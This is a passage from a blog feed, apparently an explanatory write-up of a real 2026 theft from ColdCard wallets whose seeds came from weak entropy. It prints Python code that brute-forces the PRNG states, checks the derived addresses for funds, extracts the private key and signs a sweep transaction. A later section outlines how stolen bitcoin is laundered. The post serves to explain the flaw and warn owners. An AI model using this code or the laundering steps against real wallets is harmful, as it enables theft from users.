<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>The attacker discards it and moves to the next candidate.</p>
<p><strong>Hit example</strong> (the real victim address <a href="https://mempool.space/address/bc1qe85jr4em79p66fsszkvfhwjf6p6qst58a2ahlr"target="_blank" rel="noopener"><code>bc1qe85jr4em79p66fsszkvfhwjf6p6qst58a2ahlr</code></a>, before the sweep):</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-json" data-lang="json"><span class="line"><span class="cl"><span class="p">[</span>
</span></span><span class="line"><span class="cl">  <span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="nt">&#34;txid&#34;</span><span class="p">:</span> <span class="s2">&#34;78ac8968ccf5a586d2fb9509f5af13f41e0a288bfa0f0b177d4e4b6bbebad05d&#34;</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">    <span class="nt">&#34;vout&#34;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">    <span class="nt">&#34;value&#34;</span><span class="p">:</span> <span class="mi">2989251877</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">    <span class="nt">&#34;status&#34;</span><span class="p">:</span> <span class="p">{</span><span class="nt">&#34;confirmed&#34;</span><span class="p">:</span> <span class="kc">true</span><span class="p">,</span> <span class="nt">&#34;block_height&#34;</span><span class="p">:</span> <span class="mi">960188</span><span class="p">}</span>
</span></span><span class="line"><span class="cl">  <span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="p">]</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>When <code>has_utxo</code> returns <code>True</code>, the attacker knows the seed they just generated produces that address — and therefore the corresponding private key.</p>
<h3>5. Enumerate candidates and hunt<span class="hx:absolute hx:-mt-20" id="5-enumerate-candidates-and-hunt"></span>
    <a href="#5-enumerate-candidates-and-hunt" class="subheading-anchor" aria-label="Permalink for this section"></a></h3><div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">brute_mk3</span><span class="p">(</span><span class="n">uid_low32</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="s2">&#34;&#34;&#34;
</span></span></span><span class="line"><span class="cl"><span class="s2">    Example for Mk3/Mk2 v4: scan plausible SysTick and RTC values.
</span></span></span><span class="line"><span class="cl"><span class="s2">    In practice the attacker uses GPUs/FPGAs and constrains the UID from
</span></span></span><span class="line"><span class="cl"><span class="s2">    the device serial.
</span></span></span><span class="line"><span class="cl"><span class="s2">    &#34;&#34;&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="k">for</span> <span class="n">systick</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">80_000</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">        <span class="k">for</span> <span class="n">rtc_tr</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mh">0x000000</span><span class="p">,</span> <span class="mh">0x240000</span><span class="p">,</span> <span class="mh">0x100</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">            <span class="k">for</span> <span class="n">rtc_ssr</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">256</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">                <span class="k">yield</span> <span class="n">coldcard_entropy</span><span class="p">(</span><span class="n">uid_low32</span><span class="p">,</span> <span class="n">systick</span><span class="p">,</span> <span class="n">rtc_tr</span><span class="p">,</span> <span class="n">rtc_ssr</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">brute_mk4</span><span class="p">(</span><span class="n">uid_low32</span><span class="p">,</span> <span class="n">systick</span><span class="p">,</span> <span class="n">rtc_tr</span><span class="p">,</span> <span class="n">rtc_ssr</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="s2">&#34;&#34;&#34;
</span></span></span><span class="line"><span class="cl"><span class="s2">    Example for Mk4/Q/Mk5: the fallback is fixed and the attacker enumerates
</span></span></span><span class="line"><span class="cl"><span class="s2">    the 2^32 possible secure-element reseed values.
</span></span></span><span class="line"><span class="cl"><span class="s2">    &#34;&#34;&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="k">for</span> <span class="n">reseed</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mh">0x100000000</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">        <span class="k">yield</span> <span class="n">coldcard_entropy</span><span class="p">(</span><span class="n">uid_low32</span><span class="p">,</span> <span class="n">systick</span><span class="p">,</span> <span class="n">rtc_tr</span><span class="p">,</span> <span class="n">rtc_ssr</span><span class="p">,</span> <span class="n">reseed</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">hunt</span><span class="p">(</span><span class="n">uid_low32</span><span class="p">,</span> <span class="n">generator</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="k">for</span> <span class="n">entropy</span> <span class="ow">in</span> <span class="n">generator</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="n">candidate</span> <span class="o">=</span> <span class="n">first_addresses</span><span class="p">(</span><span class="n">entropy</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="k">for</span> <span class="n">addr</span> <span class="ow">in</span> <span class="n">candidate</span><span class="p">[</span><span class="s2">&#34;receive&#34;</span><span class="p">]</span> <span class="o">+</span> <span class="n">candidate</span><span class="p">[</span><span class="s2">&#34;change&#34;</span><span class="p">]:</span>
</span></span><span class="line"><span class="cl">            <span class="k">if</span> <span class="n">has_utxo</span><span class="p">(</span><span class="n">addr</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">                <span class="nb">print</span><span class="p">(</span><span class="s2">&#34;HIT!&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">                <span class="nb">print</span><span class="p">(</span><span class="s2">&#34;  mnemonic:&#34;</span><span class="p">,</span> <span class="n">candidate</span><span class="p">[</span><span class="s2">&#34;mnemonic&#34;</span><span class="p">])</span>
</span></span><span class="line"><span class="cl">                <span class="nb">print</span><span class="p">(</span><span class="s2">&#34;  address :&#34;</span><span class="p">,</span> <span class="n">addr</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">                <span class="k">return</span> <span class="n">candidate</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># Didactic example: use a known UID and a reduced Mk3 generator.</span>
</span></span><span class="line"><span class="cl"><span class="c1"># hunt(0xAABBCCDD, brute_mk3(0xAABBCCDD))</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p><strong>What they do:</strong> <code>brute_mk3</code> scans plausible states for Mk3; <code>brute_mk4</code> scans the 2^32 secure-element reseeds; <code>hunt</code> is the generate-derive-check loop. The real attacker does not run Python; they write this in C/CUDA/FPGA and parallelize by UID. But the logic is identical.</p>
<h2>After finding the collision<span class="hx:absolute hx:-mt-20" id="after-finding-the-collision"></span>
    <a href="#after-finding-the-collision" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>When <code>hunt</code> returns, the attacker already has the <code>mnemonic</code> and the funded address. From there, they get the private key:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">embit.bip39</span> <span class="kn">import</span> <span class="n">mnemonic_to_seed</span>
</span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">embit.bip32</span> <span class="kn">import</span> <span class="n">HDKey</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">seed</span> <span class="o">=</span> <span class="n">mnemonic_to_seed</span><span class="p">(</span><span class="n">candidate_mnemonic</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">root</span> <span class="o">=</span> <span class="n">HDKey</span><span class="o">.</span><span class="n">from_seed</span><span class="p">(</span><span class="n">seed</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">addr_key</span> <span class="o">=</span> <span class="n">root</span><span class="o">.</span><span class="n">derive</span><span class="p">(</span><span class="s2">&#34;m/84&#39;/0&#39;/0&#39;/0/0&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="s2">&#34;Compressed WIF:&#34;</span><span class="p">,</span> <span class="n">addr_key</span><span class="o">.</span><span class="n">key</span><span class="o">.</span><span class="n">wif</span><span class="p">())</span>
</span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="s2">&#34;Address       :&#34;</span><span class="p">,</span> <span class="n">addr_key</span><span class="o">.</span><span class="n">address</span><span class="p">())</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>Typical output:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">Compressed WIF: L1P8P5vQUoRiNXpDuezfTf3GJtsFBWyJZsvfVs2gxNtxaAXSNhhF
</span></span><span class="line"><span class="cl">Address       : bc1qc3rmdj3ln6n05awxwetg0gz8e2aw0lzyxmaecp</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>That WIF is the private key in a format any wallet understands. From here the attacker can:</p>
<ol>
<li><strong>Import the seed or the WIF</strong> into Sparrow, Electrum, or another wallet.</li>
<li><strong>Rescan</strong> the blockchain to see all UTXOs for that seed.</li>
<li><strong>Build a transaction</strong> sending the funds to an address they control.</li>
<li><strong>Sign and broadcast</strong>.</li>
</ol>
<h3>Concrete sweep example<span class="hx:absolute hx:-mt-20" id="concrete-sweep-example"></span>
    <a href="#concrete-sweep-example" class="subheading-anchor" aria-label="Permalink for this section"></a></h3><p>In the real case, the attacker swept the 29.89251877 BTC UTXO from address <a href="https://mempool.space/address/bc1qe85jr4em79p66fsszkvfhwjf6p6qst58a2ahlr"target="_blank" rel="noopener"><code>bc1qe85jr...</code></a> to the consolidation address. What they needed to produce was a signed transaction. The skeleton, with didactic values and a fictional input, looks like this:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">bitcoinlib.transactions</span> <span class="kn">import</span> <span class="n">Transaction</span>
</span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">bitcoinlib.keys</span> <span class="kn">import</span> <span class="n">HDKey</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># key recovered from the collided seed</span>
</span></span><span class="line"><span class="cl"><span class="n">key</span> <span class="o">=</span> <span class="n">HDKey</span><span class="o">.</span><span class="n">from_seed</span><span class="p">(</span><span class="n">candidate_mnemonic</span><span class="p">)</span><span class="o">.</span><span class="n">derive</span><span class="p">(</span><span class="s2">&#34;m/84&#39;/0&#39;/0&#39;/0/0&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">input_value</span>  <span class="o">=</span> <span class="mi">2_989_251_877</span>      <span class="c1"># 29.89251877 BTC, in satoshis</span>
</span></span><span class="line"><span class="cl"><span class="n">fee</span>          <span class="o">=</span> <span class="mi">7_380</span>              <span class="c1"># fee in satoshis</span>
</span></span><span class="line"><span class="cl"><span class="n">output_value</span> <span class="o">=</span> <span class="n">input_value</span> <span class="o">-</span> <span class="n">fee</span>  <span class="c1"># what is left for the attacker</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">tx</span> <span class="o">=</span> <span class="n">Transaction</span><span class="p">(</span><span class="n">network</span><span class="o">=</span><span class="s1">&#39;bitcoin&#39;</span><span class="p">,</span> <span class="n">fee</span><span class="o">=</span><span class="n">fee</span><span class="p">,</span> <span class="n">witness_type</span><span class="o">=</span><span class="s1">&#39;segwit&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">tx</span><span class="o">.</span><span class="n">add_input</span><span class="p">(</span>
</span></span><span class="line"><span class="cl">    <span class="s1">&#39;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&#39;</span><span class="p">,</span>  <span class="c1"># victim UTXO txid</span>
</span></span><span class="line"><span class="cl">    <span class="mi">0</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">    <span class="n">keys</span><span class="o">=</span><span class="n">key</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">    <span class="n">value</span><span class="o">=</span><span class="n">input_value</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">    <span class="n">locking_script</span><span class="o">=</span><span class="nb">bytes</span><span class="o">.</span><span class="n">fromhex</span><span class="p">(</span><span class="s1">&#39;0014&#39;</span><span class="p">)</span> <span class="o">+</span> <span class="n">key</span><span class="o">.</span><span class="n">hash160</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">    <span class="n">script_type</span><span class="o">=</span><span class="s1">&#39;sig_pubkey&#39;</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">    <span class="n">address</span><span class="o">=</span><span class="n">key</span><span class="o">.</span><span class="n">address</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">tx</span><span class="o">.</span><span class="n">add_output</span><span class="p">(</span><span class="n">output_value</span><span class="p">,</span> <span class="s1">&#39;bc1qqdcszapk2yjrw0esf4t0etnlpjs5krsk5e99ru&#39;</span><span class="p">)</span>  <span class="c1"># attacker address</span>
</span></span><span class="line"><span class="cl"><span class="n">tx</span><span class="o">.</span><span class="n">sign</span><span class="p">()</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="n">tx</span><span class="o">.</span><span class="n">raw_hex</span><span class="p">())</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>A valid signed transaction looks like this (hex truncated):</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">01000000000101aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa0000000000ffffffff...</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>The attacker broadcasts that hex to any Bitcoin node (mempool.space, their own node, Electrum, etc.). The protocol does not ask where the key came from; it only checks whether the signature satisfies the script. If the signature is valid, the network includes the transaction in the next block and the UTXO changes owner.</p>
<p>In the real attack, this was done 1,195 times in 41 minutes, all with the same script, the same fee rate, and the same balance-sorted logic.</p>
<h2>What this bug class means<span class="hx:absolute hx:-mt-20" id="what-this-bug-class-means"></span>
    <a href="#what-this-bug-class-means" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>This is not an attack on the elliptic curve, SHA-256, BIP39, or Bitcoin. It is an attack on <strong>entropy</strong>. The manufacturer reduced the key space, and the protocol simply accepted the signatures that came out of that smaller space.</p>
<p>Three lessons:</p>
<ol>
<li><strong>Do not trust the appearance of randomness.</strong> Yasmarang&rsquo;s output passes simple statistical tests and looks random. But if the initial state is predictable, the entire sequence is predictable.</li>
<li><strong>Hashing does not create entropy.</strong> Passing 40 bits of input through SHA-256 twice yields a nice, uniform hash, but there are still at most <code>2^40</code> possible hashes. The attacker enumerates inputs, not hashes.</li>
<li><strong>The blockchain is public and permanent.</strong> A vulnerable wallet can sit quietly for years until someone connects the dots. On the day the attack is published, every UTXO in that key space becomes a target.</li>
</ol>
<h2>Can the attacker be caught?<span class="hx:absolute hx:-mt-20" id="can-the-attacker-be-caught"></span>
    <a href="#can-the-attacker-be-caught" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Whenever a cryptocurrency theft reaches this scale, one question keeps coming up: &ldquo;can the person be traced?&rdquo;. The short answer is: <strong>maybe, but it is not trivial</strong>, and tracing is not the same as recovering the bitcoins.</p>
<p>Clay Garrett, who is among the people investigating the case, published <a href="https://x.com/clay_garrett/status/2083247006139503065"target="_blank" rel="noopener">a thread on X</a> claiming that his team identified an unusual sweep pattern. According to the thread, the attack operator allegedly used a paid account at a well-known blockchain-services provider to query the source addresses and related activity during the sweeps. The provider&rsquo;s logs allegedly matched, with &ldquo;extraordinary specificity,&rdquo; the number, timing, and sequence of requests. The provider, Garrett says, was only delivering normal services; the requests themselves did not reveal their purpose.</p>
<p>What this means, <strong>if confirmed</strong>:</p>
<ul>
<li>A blockchain-services provider usually requires an account, and often payment. That can leave traces: email, payment method, IP address, access times, API usage patterns.</li>
<li>If the account was KYC&rsquo;d, the chance of identifying a person rises sharply. If payment was made with cryptocurrency, an anonymous voucher, or a third-party card, the link weakens.</li>
<li>Even with an IP or email, the operator may have used a VPN, Tor, disposable cloud compute, or a stolen identity. Each extra layer reduces the chance of reaching the real person.</li>
<li>The funds, as far as is known, have not yet been moved to mixers or exchanges. While they remain stationary, there is a window for freezing or judicial recovery. Once they are swapped, mixed, or converted to offshore fiat, asset recovery becomes drastically harder.</li>
</ul>
<p>So the thread points to a promising line of investigation, but <strong>it is an ongoing allegation</strong>, not a concluded proof. Catching the operator depends on how much they exposed through third-party services, the quality of the logs, jurisdiction, and how fast authorities act. Recovering the bitcoins depends on where the coins are when that happens. The two are related, but they are not the same thing.</p>
<h2>What the attacker has not done yet<span class="hx:absolute hx:-mt-20" id="what-the-attacker-has-not-done-yet"></span>
    <a href="#what-the-attacker-has-not-done-yet" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>So far, the operation has been technically competent at the attack but amateurish at the escape. The ~1,128 BTC stolen are sitting in known consolidation addresses, with no mixer, no coinjoin, no follow-up movement. That is unusual for a theft of this size and worth attention, because it determines what is still recoverable.</p>
<h3>What a mixer is, and why it has not been used<span class="hx:absolute hx:-mt-20" id="what-a-mixer-is-and-why-it-has-not-been-used"></span>
    <a href="#what-a-mixer-is-and-why-it-has-not-been-used" class="subheading-anchor" aria-label="Permalink for this section"></a></h3><p>A <strong>mixer</strong> (or <strong>tumbler</strong>) is a service that takes bitcoins from many people, shuffles the amounts inside a single transaction or a series of transactions, and returns equivalent bitcoins to fresh addresses. The goal is to break the public chain of &ldquo;where it came from.&rdquo;</p>
<p>The classic model is <strong>CoinJoin</strong>: several participants jointly sign a transaction with many inputs and many outputs of the same size. An outside observer sees the money go in but cannot tell which output belongs to whom. Tools like <strong>Wasabi Wallet</strong> and <strong>Samourai Wallet</strong> implement CoinJoin automatically. Samourai even offered a service called <strong>Whirlpool</strong>, where UTXOs go through remix rounds that make tracing even harder.</p>
<p>Another model is the centralized mixer: you send bitcoins to a service address and receive them back from a different pool, minus a fee. Services like <strong>Bitcoin Fog</strong> and <strong>Helix</strong> historically worked this way. The difference from CoinJoin is that you must trust the mixer operator — and several of those operators were arrested precisely because investigators could link deposits to withdrawals.</p>
<p>In the ColdCard theft, none of these techniques has appeared yet. The bitcoins moved from the victims&rsquo; wallets into three large clusters and have not moved since. That can mean several things:</p>
<ol>
<li><strong>The attacker is still getting ready.</strong> Stealing 1,128 BTC in 41 minutes is one thing; laundering 1,128 BTC without leaving a trace is another. Setting up an anonymization pipeline takes time, costs money, and requires pre-established accounts.</li>
<li><strong>The attacker did not expect this much visibility.</strong> Once the press and blockchain analysts start tracking addresses in real time, any immediate movement becomes news. Leaving the funds still is a way to wait for the noise to die down.</li>
<li><strong>The attacker may be negotiating a recovery.</strong> Large thefts sometimes end in settlements, with part of the funds returned in exchange for the thief&rsquo;s anonymity.</li>
</ol>
<h3>How one normally hides a haul like this<span class="hx:absolute hx:-mt-20" id="how-one-normally-hides-a-haul-like-this"></span>
    <a href="#how-one-normally-hides-a-haul-like-this" class="subheading-anchor" aria-label="Permalink for this section"></a></h3><p>If the operator really wants to make tracing difficult, the standard playbook involves several layers:</p>
<ol>
<li><strong>CoinJoin rounds.</strong> The attacker splits the funds into standardized amounts and runs them through multiple CoinJoin rounds. After a few rounds the graph stops being a tree and becomes a web, making attribution hard.</li>
<li><strong>Peel chain.</strong> Instead of sending everything at once, the operator moves small slices across dozens or hundreds of intermediate addresses, like peeling an onion. Each address forwards most of the value to the next one and a tiny fraction to a final destination.</li>
<li><strong>Instant swaps and bridges.</strong> Swapping Bitcoin for Monero on a decentralized exchange or bridge is a common path: Monero hides sender, recipient, and amount. After a few Monero transactions, the attacker can swap back into Bitcoin at fresh addresses.</li>
<li><strong>Weak-KYC or no-KYC exchanges.</strong> Depositing into exchanges that do not require identification, or that accept third-party accounts, lets the attacker convert into stablecoins, fiat, or other cryptocurrencies. Even with KYC, bought accounts or money mules help create distance.</li>
<li><strong>Offshore fiat.</strong> The final stage is turning the asset into real cash outside jurisdictions that cooperate with investigations. Unregulated exchanges, Bitcoin ATMs, prepaid cards, and accounts in tax havens fit here.</li>
</ol>
<p>None of these layers makes tracing impossible, but each raises the cost. A well-funded investigation can still follow clues: fees paid by an exchange, timing patterns, change addresses, value matches. The problem is that the more layers there are, the more time it takes — and the more time passes, the lower the chance of freezing the funds before they are spent.</p>
<h3>Why this matters now<span class="hx:absolute hx:-mt-20" id="why-this-matters-now"></span>
    <a href="#why-this-matters-now" class="subheading-anchor" aria-label="Permalink for this section"></a></h3><p>The fact that the bitcoins are still in the consolidation addresses means the recovery window is still theoretically open. Law enforcement and private investigators can monitor those addresses, request freezes at exchanges, and pressure blockchain-service providers. If the attacker sends even a single satoshi to a known mixer, alarms go off.</p>
<p>But that window closes as soon as the funds enter an anonymization pipeline. After a proper CoinJoin, a Monero swap, and a network of peel chains, the question stops being &ldquo;where is the money?&rdquo; and becomes &ldquo;who can we arrest?&rdquo;. Recovering the asset becomes technically infeasible for most victims.</p>
<p>In other words, the attacker has already won the first battle — finding and stealing the keys. The second battle, cashing out anonymously, is the one that usually separates big-wallet thieves from thieves who end up in prison.</p>
<h2>Conclusion<span class="hx:absolute hx:-mt-20" id="conclusion"></span>
    <a href="#conclusion" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>If you still have funds in a seed generated by vulnerable ColdCard firmware, the risk is not theoretical. The blockchain already shows hundreds of addresses being emptied by someone who reproduced the broken RNG.</p>
<p>The ColdCard does not hold your bitcoins. It held the key. The key was born weak. Whoever has a copy of the same key — obtained by enumerating states of a PRNG — can sign transactions on your behalf, without ever having touched the device.</p>
<p>The only defense is to move the funds to a new seed, generated by corrected firmware or, better, by a process that combines independent entropy sources (casino-grade dice, a different manufacturer&rsquo;s TRNG, an offline host). And test recovery before sending meaningful value.</p>
<p>Do not trust a company, certification, influencer, or article. Not even this one. Verify.</p>
]]></content:encoded><category>bitcoin-and-cryptocurrency</category><category>security</category><category>hardware</category></item><item><title>URGENT - If You Keep Bitcoin on a ColdCard: MOVE EVERYTHING</title><link>https://www.akitaonrails.com/en/2026/07/31/urgent-if-you-keep-bitcoin-on-a-coldcard-move-everything/</link><guid isPermaLink="true">https://www.akitaonrails.com/en/2026/07/31/urgent-if-you-keep-bitcoin-on-a-coldcard-move-everything/</guid><pubDate>Fri, 31 Jul 2026 23:00:00 GMT</pubDate><description>&lt;p&gt;I use ColdCard. Or rather, I used that old ColdCard to store part of my bitcoin. I have already moved everything that was on it to a new wallet. If your seed was generated on a ColdCard since March 2021 and you cannot prove it came from safe firmware or enough external entropy, stop reading, take inventory, and get ready to move too.&lt;/p&gt;
&lt;p&gt;I am not exaggerating for a clickbait headline. On July 29, transactions started sweeping user wallets. One consolidation address &lt;a href="https://mempool.space/address/bc1qnk4zh9qcnap2mycp56qjrgza3cc8ylrh8fecp0"target="_blank" rel="noopener"&gt;received 594.47723261 BTC across 501 outputs&lt;/a&gt;. That is public blockchain data, not a Telegram screenshot. Issue 416 of &lt;a href="https://bitcoinops.org/en/newsletters/2026/07/31/#wallets-generated-by-coldcard-at-risk-of-theft"target="_blank" rel="noopener"&gt;Bitcoin Optech&lt;/a&gt;, published while the case was still unfolding, already estimated losses above &lt;strong&gt;1,000 BTC&lt;/strong&gt;.&lt;/p&gt;</description><content:encoded><![CDATA[<p>I use ColdCard. Or rather, I used that old ColdCard to store part of my bitcoin. I have already moved everything that was on it to a new wallet. If your seed was generated on a ColdCard since March 2021 and you cannot prove it came from safe firmware or enough external entropy, stop reading, take inventory, and get ready to move too.</p>
